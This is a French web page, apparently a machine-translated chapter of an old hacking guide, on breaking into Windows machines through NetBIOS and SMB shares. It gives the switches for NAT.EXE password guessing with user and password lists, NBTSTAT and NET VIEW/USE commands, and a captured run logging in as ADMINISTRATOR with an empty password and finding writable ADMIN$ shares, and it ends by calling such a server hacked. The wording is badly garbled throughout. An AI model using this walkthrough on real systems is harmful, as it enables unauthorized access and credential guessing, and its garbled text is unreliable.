Chargement de la page en cours... 


pirate un ordinateur

Nouveauté!





Entailler De NetBios

Référence interne de la matière [ 8.0.0 ]

u peut demander tous les doutes se rapportent au nombre de section.


Ainsi le wid que la section précédente u sont bien versée avec Netbios laisse maintenant voir des intrus approcher n et comment facile est pour qu'u soit une victime.

C'est pour un but éducatif seulement



Méthodes D'Attaque De NetBIOS


Cette technique d'attaque de NetBIOS a été vérifiée sur Windows 95, poste de travail de NT 4.0, serveur de NT 4.0, bêta 1 poste de travail de NT 5.0, bêta 1 serveur de NT 5.0, Windows 98 bêtas 2.1. Un des composants étant employés est discussion de NAT.EXEA de l'outil, il commute, et les techniques communes suit :

NAT.EXE [ - nom de fichier de o ] [ - userlist de u ] [ - passlist de p ] < adresse >

Commutateurs :

- o indiquent le dossier de rendement. Tous les résultats du balayage
sera écrit au dossier indiqué, en outre
au rendement standard.
- u indiquent le dossier pour lire des usernames de. Usernames
sera lu à partir du dossier indiqué quand tentative
ing pour deviner le mot de passe sur le serveur à distance.
Usernames devrait apparaître un par la ligne dans le speci-
fied le dossier.
- p indiquent le dossier pour lire des mots de passe de. Mots de passe
sera lu à partir du dossier indiqué quand tentative
ing pour deviner le mot de passe sur le serveur à distance.
Les mots de passe devraient apparaître un par la ligne dans le speci-
fied le dossier.
< adresse >
Des adresses devraient être indiquées dans la virgule deliminated
format, sans les espaces. Specifica- valide d'adresse
les tions incluent :
hostname - l'"hostname" est ajouté
127.0.0.1-127.0.0.3, ajoute les adresses 127.0.0.1
par 127.0.0.3
127.0.0.1-3, ajoute les adresses 127.0.0.1 à travers
127.0.0.3
127.0.0.1-3.7.10-20, ajoute les adresses 127.0.0.1
par 127.0.0.3, 127.0.0.7, 127.0.0.10 à travers
127.0.0.20.
hostname, 127.0.0.1-3, additionne l'"hostname" et 127.0.0.1
par 127.0.0.1
Toutes les combinaisons des hostnames et des plages d'adresses As
sont indiqués ci-dessus valide.

[ 8.0.1 ] Comparer NAT.EXE aux propres executables de Microsoft

[ 8.0.2 ] D'abord, un regard à NBTSTAT

D'abord nous regardons la commande de NBTSTAT. Cette commande a été discutée dans de premières parties du livre ([ 5.0.6 ] la commande de Nbtstat). Dans cette section, vous verrez une démonstration de la façon dont cet outil est utilisé et de la façon dont il compare à l'autre Microsoft des outils et non des outils de Microsoft.

Ce qui suit est joli beaucoup un guide étape-par-étape d'employer NBTSTAT aussi bien que l'information supplémentaire. Encore, si le youre intéressé à plus de NBSTAT commute et des fonctions, regardez [ les 5.0.6 ] parties de commande de Nbtstat du livre.


C:\nbtstat - Un XXX.XX.XXX.XX

Tableau De Nom De Machine À distance De NetBIOS

Type Nommé Statut

STUDENT1 < 20 > UNIQUES Enregistrés
STUDENT1 < 00 > UNIQUES Enregistrés
DOMAIN1 < 00 > GROUPES Enregistrés
GROUPE de DOMAIN1 < 1C > Enregistré
UNIQUE de DOMAIN1 < 1b > Enregistré
STUDENT1 < 03 > UNIQUES Enregistrés
GROUPE Du l'< 1E > DOMAIN1 Enregistré
UNIQUE Du < 1D > DOMAIN1 Enregistré
..__MSBROWSE__.<01 > GROUPE Enregistré

MAC address = 00-C0-4F-C4-8C-9D

Voici une 16ème liste partielle de peu de NetBIOS :

Nom UNIQUE de service de poste de travail de Computername < 00 >
Domain Name du GROUPE < 00 >
Nom UNIQUE de service de serveur du serveur < 20 >

Computername < 03 > UNIQUES enregistrés par le service de messager. C'est le computername
être ajouté au dossier de LMHOSTS qui n'est pas nécessaire pour employer
NAT.EXE mais est nécessaire si vous voudriez regarder l'extérieur
ordinateur dans le voisinage de réseau.
Username < 03 > s'est enregistré par le service de messager.
Domainname < 1b > enregistre l'ordinateur local en tant que navigateur principal pour le domaine
Domainname < 1C > enregistre l'ordinateur comme contrôleur de domaine pour le domaine
(PDC ou BDC)
Domainname < 1D > enregistre le client local pendant que les segments locaux maîtrisent le navigateur
pour le domaine
Domainname < 1E > s'enregistre comme nom de NetBIOS de groupe
Nom De Moniteur De Réseau De < BF >
< SOYEZ > Agent De Moniteur De Réseau
Serveur D'< 06 > RAS
DDE Net D'< 1F >
Client D'< 21 > RAS

[ 8.0.3 ] Introduction aux commandes NETTES

La commande NETTE est une commande que les admins peuvent exécuter par une fenêtre de DOS pour montrer des informations sur des serveurs, des réseaux, des parts, et des raccordements. Elle a également un certain nombre d'options de commande que vous pouvez employer pour ajouter des comptes et des groupes d'utilisateur, pour changer des arrangements de domaine, et pour configurer des parts. Dans cette section, vous vous renseignerez sur ces commandes NETTES, et vous aurez également le contour à un fichier séquentiel NET de commande qui peut être employé comme outil primitif d'analyse des valeurs de réseau. Avant que nous continuions dessus les techniques, une discussion des options disponibles viendra d'abord :

[ 8.0.4 ] Comptes Nets : Cette commande montre les arrangements courants pour le mot de passe, les limitations d'ouverture, et l'information de domaine. Elle contient également des options pour mettre à jour la base de données de comptes d'utilisateur et modifier des conditions de mot de passe et d'ouverture.

[ 8.0.5 ] Ordinateur Net : Ceci ajoute ou supprime des ordinateurs d'une base de données de domaines.

[ 8.0.6 ] Serveur de config ou poste de travail net de config de filet : Montre l'information de config au sujet du service de serveur. Une fois utilisée sans serveur ou poste de travail d'indication, la commande montre une liste de services configurables.

[ 8.0.7 ] Le Filet Continuent : Réactive un service de NT qui a été suspendu par une commande NETTE de PAUSE.

[ 8.0.8 ] Dossier Net : Les listes de ces commandes les dossiers ouverts sur un serveur et a des options pour les dossiers partagés par fermeture et enlever des serrures de dossier.

[ 8.0.9 ] Groupe Net : Ces informations d'affichages sur des noms de groupe et ont des options que vous pouvez employer pour ajouter ou modifier les groupes globaux sur des serveurs.

[ 8.1.0 ] Aide Nette : Aide avec ces commandes

[ 8.1.1 ] Le message net de Helpmsg # : obtenez l'aide avec un message net particulier d'erreur ou de fonction.

[ 8.1.2 ] Produisez net Localgroup : Employez ceci pour énumérer les groupes locaux sur des serveurs. Vous pouvez également modifier ces groupes.

[ 8.1.3 ] Nom Net : Cette commande montre les noms des ordinateurs et utilisateurs auxquels des messages sont envoyés sur l'ordinateur.

[ 8.1.4 ] Pause Nette : Employez cette commande de suspendre un certain service de NT.

[ 8.1.5 ] Produisez net La Copie : Tirages d'affichages et files d'attente partagées.

[ 8.1.6 ] Le Filet Envoient : Employez cette commande d'envoyer des messages à d'autres utilisateurs, ordinateurs, ou noms de transmission de messages sur le réseau.

[ 8.1.7 ] Produisez net La Session : Montre des informations sur des sessions courantes. A en outre des commandes pour certaines sessions débranchantes.

[ 8.1.8 ] Part Nette : Employez cette commande d'énumérer des informations sur toutes les ressources étant partagées sur un ordinateur. Cette commande est également utilisée comme moyen de créer des parts de réseau.

[ 8.1.9 ] Statistiques nettes serveur ou poste de travail : Montre la notation de statistiques.

[ 8.2.0 ] Arrêt Net : Les services de NT d'arrêts, décommandant tous les raccordements le service emploie. Laissez lui soyez su qu'arrêtant un service, peut arrêter d'autres services.

[ 8.2.1 ] Produisez net Le Temps : Cette commande est utilisée comme moyen pour montrer ou placer le moment pour un ordinateur ou un domaine.

[ 8.2.2 ] Utilisation Nette : Ceci montre une liste d'ordinateurs reliés et a des options pour se relier à et démonter des ressources partagées.

[ 8.2.3 ] Utilisateur Net : Cette commande montrera une liste de comptes d'utilisateur pour l'ordinateur, et a des options pour créer une modification de ces comptes.

[ 8.2.4 ] Vue Nette : Cette commande montre une liste de ressources étant partagées sur un ordinateur. Y compris des serveurs de netware.

[ 8.2.5 ] Note spéciale sur le DOS et les machines plus anciennes de Windows : Les commandes énumérées ci-dessus sont disponibles aux serveurs de Windows NT et le poste de travail, le DOS et les clients plus âgés de Windows ont ces commandes NETTES disponibles :

Config Nettes
Diag net (courses le programme de diagnostic)
Aide Nette
Init net (conducteurs d'adapteur de protocole et de réseau de charges.)
Fermeture de session Nette
Ouverture Nette
Mot de passe net (mot de passe de changements)
Copie Nette
Début Net
Arrêt Net
Temps Net
Utilisation Nette
Ver net (affichages le type et la version du redirector de réseau)
Vue Nette

Pour cette section, la commande étant employée est les commandes NETTES de VUE et d'UTILISATION de FILET.

[ 8.2.6 ] La VUE et le FILET NETS réels EMPLOIENT les récupérations d'écran pendant une entaille.

Vue XXX.XX.XXX.XX de C:\net

Ressources partagées à XXX.XX.XXX.XX

Type nommé de part utilisé en tant que commentaire


Part de serveur d'ouverture de disque de NETLOGON
Examinez Le Disque
La commande accomplie avec succès.

NOTE : L'ADMIN$ et IP sont cachés et ne sont pas montrés.


Utilisation de C:\net/?

La syntaxe de cette commande est :

UTILISATION NETTE [ devicename | * ] [ \\computername\sharename[\volume ] [ mot de passe | * ] ]
[/USER:[domainname\]username ]
[ [/EFFACEMENT ] | [/PERSISTENT:{YES | AUCUN} ] ]

UTILISATION NETTE [ devicename | * ] [ mot de passe | * ] ] [/À LA MAISON ]

UTILISATION NETTE [/PERSISTENT:{YES | AUCUN} ]

Utilisation X de C:\net : \\XXX.XX.XXX.XX\test

La commande accomplie avec succès.

Utilisation de C:\unzipped\nat10bin>net

On se rappellera de nouveaux raccordements.

Réseau À distance Local De Statut


X CORRECT : réseau de \\XXX.XX.XXX.XX\test Microsoft Windows
Réseau CORRECT De \\XXX.XX.XXX.XX\test Microsoft Windows

La commande accomplie avec succès.

Voici un exemple réel de la façon dont le programme de NAT.EXE est employé. L'information énumérée ici est une capture réelle de l'activité. Les adresses d'IP ont été changées pour nous protéger, bien.

C:\nat - o output.txt - u userlist.txt - p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY


usernames de lecture de [*]--- d'userlist.txt
mots de passe de lecture de [*]--- de passlist.txt

[*]--- vérifiant le centre serveur : XXX.XX.XXX.XX
[*]--- obtenant la liste de noms à distance de NetBIOS

[*]--- essayant de se relier au nom : *
[*]--- incapable de se relier

[*]--- essayant de se relier au nom : * SMBSERVER
le [*]--- S'EST RELIÉ au nom : * SMBSERVER
[*]--- essayant de se relier au protocole : RÉSEAUX 1.03 de MICROSOFT
le temps de serveur de [*]--- est le DEC 01 07:44:34 1997 de mon
le [*]--- Timezone est UTC-6.0
le serveur à distance de [*]--- veut que nous chiffrent, le disant pas à

[*]--- essayant de se relier au nom : * SMBSERVER
le [*]--- S'EST RELIÉ au nom : * SMBSERVER
[*]--- essayant d'établir la session
le [*]--- ne pouvait pas établir la session sans le mot de passe
[*]--- essayant de se relier au username : Mot de passe d'ADMINISTRATEUR De ` ': mot de passe de ` '
[*]--- RELIÉ : Username : Mot de passe d'ADMINISTRATEUR De ` ': mot de passe de ` '

le [*]--- a obtenu l'information de serveur :

Server=[STUDENT1 ] User=[ ] Workgroup=[DOMAIN1 ] Domain=[ ]

le [*]--- a obtenu la liste des parts :

Type Commentaire De Sharename

Disque d'ADMIN$ : Admin À distance
Disque D': Part de défaut
IP IPC : IPC À distance
Disque de NETLOGON : Part de serveur d'ouverture
Disque D'Essai :

le [*]--- cette machine a une liste de lecture rapide :

Commentaire De Serveur

STUDENT1


[*]--- essayant d'accéder à la part : \\*SMBSERVER \
[*]--- incapable d'accéder

[*]--- essayant d'accéder à la part : \\*SMBSERVER\ADMIN$
AVERTISSEMENT de [*]--- : Capable accéder à la part : \\*SMBSERVER\ADMIN$
la vérification de [*]--- écrivent l'accès dans : \\*SMBSERVER\ADMIN$
AVERTISSEMENT de [*]--- : L'annuaire est writeable : \\*SMBSERVER\ADMIN$
[*]--- essayant d'exercer. le bogue dessus : \\*SMBSERVER\ADMIN$

[*]--- essayant d'accéder à la part : \\*SMBSERVER\
AVERTISSEMENT de [*]--- : Capable accéder à la part : \\*SMBSERVER\
la vérification de [*]--- écrivent l'accès dans : \\*SMBSERVER\
AVERTISSEMENT de [*]--- : L'annuaire est writeable : \\*SMBSERVER\
[*]--- essayant d'exercer. le bogue dessus : \\*SMBSERVER\

[*]--- essayant d'accéder à la part : \\*SMBSERVER\NETLOGON
AVERTISSEMENT de [*]--- : Capable accéder à la part : \\*SMBSERVER\NETLOGON
la vérification de [*]--- écrivent l'accès dans : \\*SMBSERVER\NETLOGON
[*]--- essayant d'exercer. le bogue dessus : \\*SMBSERVER\NETLOGON

[*]--- essayant d'accéder à la part : \\*SMBSERVER\Test
AVERTISSEMENT de [*]--- : Capable accéder à la part : \\*SMBSERVER\Test
la vérification de [*]--- écrivent l'accès dans : \\*SMBSERVER\Test
[*]--- essayant d'exercer. le bogue dessus : \\*SMBSERVER\Test

[*]--- essayant d'accéder à la part : \\*SMBSERVER\D$
[*]--- incapable d'accéder

[*]--- essayant d'accéder à la part : \\*SMBSERVER\ROOT
[*]--- incapable d'accéder

[*]--- essayant d'accéder à la part : \\*SMBSERVER\WINNT$
[*]--- incapable d'accéder

Si la part de défaut de la commande d'Everyone/Full est en activité, alors vous êtes fait, le serveur est entaillé. Si pas, continuez le jeu. Vous serez étonné ce que vous découvrez.